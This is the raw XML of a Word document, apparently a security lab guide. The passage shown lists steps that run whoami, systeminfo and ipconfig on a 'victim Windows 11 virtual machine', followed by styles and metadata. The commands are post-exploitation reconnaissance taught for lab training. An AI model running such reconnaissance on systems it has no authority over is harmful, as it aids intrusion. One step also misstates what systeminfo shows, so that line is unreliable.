            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>whoami</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> command to display information about the current effective user logged into the system.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4945578B" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="009A3A3B">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5716002F" wp14:editId="0211E3A5">
                  <wp:extent cx="4732118" cy="1793875"/>
                  <wp:effectExtent l="19050" t="19050" r="11430" b="15875"/>
                  <wp:docPr id="1517571083" name="Picture 151757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a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4737642" cy="1795969"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:sysClr val="windowText" lastClr="000000"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="043C3E2D" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="009A3A3B">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">9. Execute the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>systeminfo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> command to display information about the current effective user logged into the system.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1629ED30" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="009A3A3B">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0356D8E2" wp14:editId="35CB0276">
                  <wp:extent cx="4430405" cy="2691028"/>
                  <wp:effectExtent l="19050" t="19050" r="27305" b="14605"/>
                  <wp:docPr id="1517571084" name="Picture 151757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
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4433725" cy="2693044"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:sysClr val="windowText" lastClr="000000"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="617CFDB0" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="009A3A3B">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">10. Execute the </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ipconfig</w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> command to display the network configuration of the victim Windows 11 virtual machine.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="131D2C12" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="009A3A3B">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="482A47B8" wp14:editId="190E26C0">
                  <wp:extent cx="4440617" cy="3700760"/>
                  <wp:effectExtent l="19050" t="19050" r="17145" b="14605"/>
                  <wp:docPr id="1517571085" name="Picture 151757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a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4442166" cy="3702051"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:sysClr val="windowText" lastClr="000000"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="76D767CC" w14:textId="77777777" w:rsidR="00950B2F" w:rsidRPr="00AB1F43" w:rsidRDefault="00950B2F" w:rsidP="00AB1F43">
      <w:bookmarkStart w:id="6" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:sectPr w:rsidR="00950B2F" w:rsidRPr="00AB1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8617A14"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="59684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2EC"/>
    <w:rsid w:val="002F7AFB"/>
    <w:rsid w:val="004D22EC"/>
    <w:rsid w:val="00814574"/>
    <w:rsid w:val="00950B2F"/>
    <w:rsid w:val="00AB1F43"/>
    <w:rsid w:val="00C32321"/>
    <w:rsid w:val="00D55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C54C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0795E469-F08C-43EE-A67C-2CA1ADAE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PS Body"/>
    <w:qFormat/>
    <w:rsid w:val="004D22EC"/>
    <w:pPr>
      <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Constantia" w:eastAsia="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="002F7A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IPS Heading 2"/>
    <w:basedOn w:val="Heading1"/>
    <w:link w:val="Heading2Char"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="002F7AFB"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:before="480" w:after="180"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Constantia" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Constantia"/>
      <w:b/>
      <w:bCs/>
      <w:noProof/>
      <w:color w:val="171717"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:aliases w:val="IPS Heading 3"/>
    <w:basedOn w:val="TOC3"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="002F7AFB"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:tabs>
        <w:tab w:val="left" w:pos="960"/>
        <w:tab w:val="right" w:pos="9010"/>
      </w:tabs>
      <w:spacing w:before="120" w:after="120"/>
      <w:ind w:left="0"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:noProof/>
      <w:szCs w:val="16"/>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Q"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="ListParagraphChar"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="004D22EC"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListParagraphChar">
    <w:name w:val="List Paragraph Char"/>
    <w:aliases w:val="PQ Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="ListParagraph"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="004D22EC"/>
    <w:rPr>
      <w:rFonts w:ascii="Constantia" w:eastAsia="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="TableGrid1">
    <w:name w:val="Table Grid1"/>
    <w:basedOn w:val="TableNormal"/>
    <w:next w:val="TableGrid"/>
    <w:uiPriority w:val="59"/>
    <w:qFormat/>
    <w:rsid w:val="004D22EC"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Constantia" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Constantia" w:cs="Constant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qFormat/>
    <w:rsid w:val="004D2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IPS Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="002F7AFB"/>
    <w:rPr>
      <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:noProof/>
      <w:color w:val="171717"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:aliases w:val="IPS Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="002F7AFB"/>
    <w:rPr>
      <w:rFonts w:ascii="Constantia" w:eastAsia="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:noProof/>
      <w:sz w:val="20"/>
      <w:szCs w:val="16"/>
      <w:u w:val="single"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="002F7AFB"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002F7AFB"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="400"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:link w:val="NoSpacingChar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="002F7AFB"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="240" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Constantia"/>
      <w:i/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:u w:val="single"/>
      <w:lang w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="NoSpacingChar">
    <w:name w:val="No Spacing Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="NoSpacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="002F7AFB"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Constantia"/>
      <w:i/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:u w:val="single"/>
      <w:lang w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="TableGrid3">
    <w:name w:val="Table Grid3"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:qFormat/>
    <w:rsid w:val="00D55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qFormat/>
    <w:rsid w:val="00D55363"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
      <w:lang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6">
    <w:name w:val="Table Grid6"/>
    <w:basedOn w:val="TableNormal"/>
    <w:next w:val="TableGrid"/>
    <w:uiPriority w:val="39"/>
    <w:qFormat/>
    <w:rsid w:val="00D55363"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
      <w:lang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next w:val="TableGrid"/>
    <w:uiPriority w:val="39"/>
    <w:qFormat/>
    <w:rsid w:val="00D55363"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
      <w:lang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next w:val="TableGrid"/>
    <w:uiPriority w:val="39"/>
    <w:qFormat/>
    <w:rsid w:val="00D55363"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
      <w:lang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qFormat/>
    <w:rsid w:val="00950B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1592</Words>
  <Characters>9077</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>75</Lines>
  <Paragraphs>21</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <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Jawed</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Mehwish Jawed</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-09T14:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-09T14:52:00Z</dcterms:modified>
</cp:coreProperties>
</file>